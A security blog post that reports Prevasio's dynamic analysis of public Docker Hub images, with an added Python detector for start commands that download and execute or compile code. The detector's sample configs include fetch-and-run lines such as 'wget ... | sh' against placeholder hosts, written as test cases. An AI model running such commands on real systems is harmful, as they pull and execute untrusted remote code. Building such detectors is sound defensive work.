Misconfiguration of Docker containers continues to harbor critical vulnerabilities. A recent study shows public Docker Hub images are contributing to the problem.
Earlier this month, we wrote about a Docker container vulnerability due to misconfiguration. Blackrota entered the scene, designed to exploit the exact vulnerabilities that the misconfigured containers had. Around the same time, Prevasio released the results of “Operation ‘Red Kangaroo’: Industry’s First Dynamic Analysis of 4M Public Docker Hub Images”, and the findings were dismal. Over half of the images that were analyzed had critical vulnerabilities.
From Prevasio’s report:
“In order to handle such a massive volume of images, Prevasio Analyzer was executed non-stop for a period of one month on 800 machines running in parallel.
The result of our dynamic scan reveals that:
- 51 percent of all containers had “critical” vulnerabilities, while 13 percent were classified as “high” and four percent as “moderate” vulnerabilities.
- Six thousand containers were riddled with cryptominers, hacking tools/pen testing frameworks, and backdoor trojans. While many cryptominers and hacking tools may not be malicious per se, they present a potentially unwanted issue to an enterprise.
- More than 400 container images (with nearly 600,000 pulls) of weaponized Windows malware crossing over into the world of Linux. This crossover is directly due to the proliferation of cross-platform code (e.g. GoLang, .NET Core and PowerShell Core).
Our analysis of malicious containers also shows that quite a few images contain a dynamic payload. That is, an image in its original form does not have a malicious binary. However, at runtime, it might be scripted to download a source of a coinminer, to then compile and execute it.”
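The dynamic-payload pattern the report describes (no malicious binary in the image, but a start command that fetches code and then runs or compiles it) can be checked for in its crude form by inspecting an image's declared Entrypoint and Cmd. The following is an added example, not Prevasio's analyzer or any code from the report: the regexes, sample image names and configs are constructed assumptions in the shape of `docker inspect`'s `.Config` section.

```python
import json
import re

# Heuristics for the "dynamic payload" pattern: the image carries no malicious
# binary, but its start command downloads something and then executes or
# compiles it. These patterns are assumptions of this example, not a signature
# set from the report.
FETCH = re.compile(r"\b(curl|wget)\b")
EXEC_AFTER_FETCH = re.compile(r"\|\s*(sh|bash)\b|&&\s*(sh|bash|\./)")
BUILD = re.compile(r"\b(gcc|cc|g\+\+|make|cmake)\b|\bgo\s+build\b|\bcargo\s+build\b")


def start_command(config):
    """Join Entrypoint and Cmd (as 'docker inspect' reports them) into one string."""
    parts = (config.get("Entrypoint") or []) + (config.get("Cmd") or [])
    return " ".join(parts)


def runtime_payload_findings(config):
    """Return a list of findings for one image config; an empty list means nothing flagged."""
    cmd = start_command(config)
    findings = []
    if FETCH.search(cmd):
        if EXEC_AFTER_FETCH.search(cmd):
            findings.append("start command downloads and then executes the download")
        if BUILD.search(cmd):
            findings.append("start command downloads and then compiles (miner-from-source pattern)")
    return findings


def scan_images(images):
    """Map image name -> findings for a dict of name -> config."""
    return {name: runtime_payload_findings(cfg) for name, cfg in images.items()}


# Constructed sample configs (hypothetical image names, placeholder URLs).
SAMPLE_IMAGES = {
    "web/nginx:demo": {"Entrypoint": None, "Cmd": ["nginx", "-g", "daemon off;"]},
    "tools/fetch-run:demo": {"Entrypoint": ["/bin/sh", "-c"],
                             "Cmd": ["wget -qO- http://example.invalid/run.sh | sh"]},
    "tools/build-run:demo": {"Entrypoint": None,
                             "Cmd": ["sh", "-c", "curl -s http://example.invalid/src.tgz | tar xz"
                                                 " && gcc -o m m.c && ./m"]},
}

if __name__ == "__main__":
    # Only the declared start command is inspected here; a fetch hidden in a
    # script baked into the image needs a sandboxed run (dynamic analysis) to catch.
    print(json.dumps(scan_images(SAMPLE_IMAGES), indent=2))
```

Two of the three constructed images are flagged; the nginx one is not, which is the point: a static look at the start command is cheap but only catches what the image declares openly.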
This is a really big problem. It’s clear that threat actors already know this issue exists, and have known for some time. Docker Hub hosts over 4 million images, which are expected to top 100 million downloads in 2020. How many companies have used these images? How many businesses are losing money they didn’t know they were losing? What will the extent of the damage look like when all is said and done? Unfortunately, it’s going to be a very long time before we have those answers. The impact will be far-reaching and likely costly.
This discovery illustrates another reason we say that configuration matters, and why code should be reviewed when it’s publicly available. It’s why we say that testing matters, and why bringing in an expert is always a good idea: someone who can verify that your configuration looks good, that your code is clean, stable and secure, and who can test products before they are launched. An outside pair of eyes will always catch something your own team doesn’t see, precisely because your team has spent so much time looking at it. Finding those misses is imperative to the security of your business.
Security isn’t just about firewalls, protocols, hackers, incident response and magical voodoo. It’s configuration, solid code, proper testing, diligence, vigilance, and properly training non-technical employees. It’s not magic, it’s not even necessarily hard, and it is absolutely vital to the success of your business. If there’s one thing you don’t skimp on in 2021, make it security!